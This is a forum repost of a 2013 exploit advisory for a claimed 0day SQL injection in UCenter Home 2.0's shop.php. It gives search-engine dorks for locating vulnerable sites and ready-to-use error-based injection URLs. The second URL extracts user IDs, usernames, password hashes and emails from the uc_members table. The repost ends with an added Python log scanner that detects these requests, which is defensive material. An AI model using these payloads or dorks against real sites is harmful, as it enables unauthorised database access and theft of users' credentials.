China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

You use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
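Added example, not part of the original post or of UCenter Home: a log check for spotting requests like the ones above. It flags shop.php requests whose shopid is not a plain integer, and separately those carrying the error-based fragments the advisory relies on. The Apache-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Fragments of the MySQL error-based pattern shown in the advisory above.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by", r"concat\s*\(",
)]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_request(log_line):
    """Classify one access-log line: 'ok', 'non_numeric_shopid' or 'error_based_sqli'."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return "ok"
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return "ok"
    # parse_qs percent-decodes values, so encoded payloads are matched in clear text.
    values = parse_qs(url.query, keep_blank_values=True).get("shopid", [])
    verdict = "ok"
    for value in values:
        if re.fullmatch(r"\d{1,10}", value):
            continue  # a legitimate shop id is a plain integer
        hits = sum(1 for marker in MARKERS if marker.search(value))
        if hits >= 2:
            return "error_based_sqli"
        verdict = "non_numeric_shopid"
    return verdict

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2013:21:30:01 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [27/Feb/2013:21:30:07 +0800] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 812',
    '192.0.2.11 - - [27/Feb/2013:21:30:09 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 930',
    '192.0.2.12 - - [27/Feb/2013:21:31:00 +0800] "GET /index.php HTTP/1.1" 200 4000',
]

def scan(lines):
    """Return (verdict, line) pairs for every line that is not 'ok'."""
    results = [(classify_request(line), line) for line in lines]
    return [(verdict, line) for verdict, line in results if verdict != "ok"]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(verdict, "<-", line[:90])
```

The same integer-only rule, enforced on shopid before it reaches the query, is what removes the injection point; the log check only tells you whether it has been probed.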




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2